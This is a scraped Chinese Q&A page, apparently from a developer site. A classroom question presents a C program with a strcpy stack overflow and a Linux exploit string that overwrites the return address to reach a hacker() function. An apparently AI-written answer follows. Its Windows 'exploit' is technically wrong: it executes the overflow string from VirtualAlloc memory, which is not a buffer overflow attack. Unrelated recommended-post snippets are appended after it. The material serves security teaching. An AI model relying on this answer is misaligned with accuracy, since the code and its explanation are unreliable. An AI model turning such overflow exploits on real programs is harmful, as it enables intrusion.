下面给出缓冲区溢出漏洞的一个实例,请结合函数调用的栈结构,说明为什么攻击会成功。 test.c #include <stdio.h> #include "string.h'" void outputs(char*str){ char buffer[16]; strcpy(buffer, str); printf("%s \n", buffer); void hacker(void){ printf("being hacked\n"); int main(int argc, char** argv[]){ outputs(argv[1]); return 0; 假定hacker函数首地址为0x8048411,则可编写如下的攻击代码实施攻击。 #include <stdio.h> char code[] “0123456789ABCDEFXXXX" “\x11\x84\x04\x08 "|x00"; int main(void){ char *arg[3]; arg[0]="./test". arg[1]=code; arg[2]=NULL; execve(arg[0], arg, NULL); return 0; 请在Windows平台上验证攻击能否成功?如果不成功,请说明原因?通过查阅资料,你能否 编写出Windows平台上的一个缓冲区溢出漏洞利用程序?全部代码和分析

时间: 2024-01-20 12:03:03 浏览: 21
首先,这个程序存在缓冲区溢出漏洞的原因在于,在函数outputs中使用了strcpy函数将str字符串复制到了buffer数组中,但是没有对str字符串长度进行限制,当str字符串长度大于16时,就会导致buffer数组溢出。 攻击成功的原因在于,攻击者构造了一个字符串code,其中包含了hacker函数的地址0x8048411以及一些填充字符。当攻击者将code字符串作为参数传递给程序时,程序会调用outputs函数,并将code字符串复制到buffer数组中。由于code字符串中包含了hacker函数的地址,因此,当程序执行完strcpy函数后,会从hacker函数的地址开始执行,进而执行hacker函数中的代码,从而实现了攻击。 在Windows平台上,由于函数调用的栈结构不同,攻击代码需要进行相应的修改。以下是一个Windows平台上的缓冲区溢出漏洞利用程序的示例: ```c #include <windows.h> void hacker(){ MessageBox(NULL, "Being hacked!", "Warning", MB_OK); } void outputs(char* str){ char buffer[16]; strcpy(buffer, str); printf("%s\n", buffer); } int main(int argc, char* argv[]){ outputs(argv[1]); return 0; } ``` 攻击代码: ```c #include <windows.h> char code[] = "AAAAAAAAAAAAAAAA" // 填充字符 "\x10\x00\x40\x00" // hacker函数地址,little-endian格式 "BBBB"; // 填充字符 int main(){ LPVOID lpvPayload = VirtualAlloc(NULL, sizeof(code), MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(lpvPayload, code, sizeof(code)); ((void(*)())lpvPayload)(); return 0; } ``` 攻击代码中,首先使用VirtualAlloc函数在进程的虚拟地址空间中分配一段可读写可执行的内存,然后将攻击代码复制到这段内存中,并将其转换为函数指针类型,最后调用该函数指针即可触发攻击。需要注意的是,Windows平台上的攻击代码中,函数地址需要使用little-endian格式。

相关推荐

最新推荐

recommend-type

C 语言中实现环形缓冲区

本文主要是介绍 C语言实现环形缓冲区,并附有详细实现代码,具有一定的参考价值,希望能帮助有需要的小伙伴
recommend-type

结合C语言缓冲区谈scanf()函数

遇到 scanf() 函数,程序会先检查输入缓冲区中是否有数据: • 如果没有,就等待用户输入。用户从键盘输入的每个字符都会暂时保存到缓冲区,直到按下回车键,输入结束,scanf() 再从缓冲区中读取数据,赋值给变量。 ...
recommend-type

C#环形缓冲区(队列)完全实现

主要为大家详细介绍了C#环形缓冲区(队列)完全实现代码,感兴趣的小伙伴们可以参考一下
recommend-type

zigbee-cluster-library-specification

最新的zigbee-cluster-library-specification说明文档。
recommend-type

管理建模和仿真的文件

管理Boualem Benatallah引用此版本:布阿利姆·贝纳塔拉。管理建模和仿真。约瑟夫-傅立叶大学-格勒诺布尔第一大学,1996年。法语。NNT:电话:00345357HAL ID:电话:00345357https://theses.hal.science/tel-003453572008年12月9日提交HAL是一个多学科的开放存取档案馆,用于存放和传播科学研究论文,无论它们是否被公开。论文可以来自法国或国外的教学和研究机构,也可以来自公共或私人研究中心。L’archive ouverte pluridisciplinaire
recommend-type

实现实时数据湖架构:Kafka与Hive集成

![实现实时数据湖架构:Kafka与Hive集成](https://img-blog.csdnimg.cn/img_convert/10eb2e6972b3b6086286fc64c0b3ee41.jpeg) # 1. 实时数据湖架构概述** 实时数据湖是一种现代数据管理架构,它允许企业以低延迟的方式收集、存储和处理大量数据。与传统数据仓库不同,实时数据湖不依赖于预先定义的模式,而是采用灵活的架构,可以处理各种数据类型和格式。这种架构为企业提供了以下优势: - **实时洞察:**实时数据湖允许企业访问最新的数据,从而做出更明智的决策。 - **数据民主化:**实时数据湖使各种利益相关者都可
recommend-type

2. 通过python绘制y=e-xsin(2πx)图像

可以使用matplotlib库来绘制这个函数的图像。以下是一段示例代码: ```python import numpy as np import matplotlib.pyplot as plt def func(x): return np.exp(-x) * np.sin(2 * np.pi * x) x = np.linspace(0, 5, 500) y = func(x) plt.plot(x, y) plt.xlabel('x') plt.ylabel('y') plt.title('y = e^{-x} sin(2πx)') plt.show() ``` 运行这段
recommend-type

JSBSim Reference Manual

JSBSim参考手册,其中包含JSBSim简介,JSBSim配置文件xml的编写语法,编程手册以及一些应用实例等。其中有部分内容还没有写完,估计有生之年很难看到完整版了,但是内容还是很有参考价值的。
recommend-type

"互动学习:行动中的多样性与论文攻读经历"

多样性她- 事实上SCI NCES你的时间表ECOLEDO C Tora SC和NCESPOUR l’Ingén学习互动,互动学习以行动为中心的强化学习学会互动,互动学习,以行动为中心的强化学习计算机科学博士论文于2021年9月28日在Villeneuve d'Asq公开支持马修·瑟林评审团主席法布里斯·勒菲弗尔阿维尼翁大学教授论文指导奥利维尔·皮耶昆谷歌研究教授:智囊团论文联合主任菲利普·普雷教授,大学。里尔/CRISTAL/因里亚报告员奥利维耶·西格德索邦大学报告员卢多维奇·德诺耶教授,Facebook /索邦大学审查员越南圣迈IMT Atlantic高级讲师邀请弗洛里安·斯特鲁布博士,Deepmind对于那些及时看到自己错误的人...3谢谢你首先,我要感谢我的两位博士生导师Olivier和Philippe。奥利维尔,"站在巨人的肩膀上"这句话对你来说完全有意义了。从科学上讲,你知道在这篇论文的(许多)错误中,你是我可以依
recommend-type

实现实时监控告警系统:Kafka与Grafana整合

![实现实时监控告警系统:Kafka与Grafana整合](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9tbWJpei5xcGljLmNuL21tYml6X2pwZy9BVldpY3ladXVDbEZpY1pLWmw2bUVaWXFUcEdLT1VDdkxRSmQxZXB5R1lxaWNlUjA2c0hFek5Qc3FyRktudFF1VDMxQVl3QTRXV2lhSWFRMEFRc0I1cW1ZOGcvNjQw?x-oss-process=image/format,png) # 1.1 Kafka集群架构 Kafka集群由多个称为代理的服务器组成,这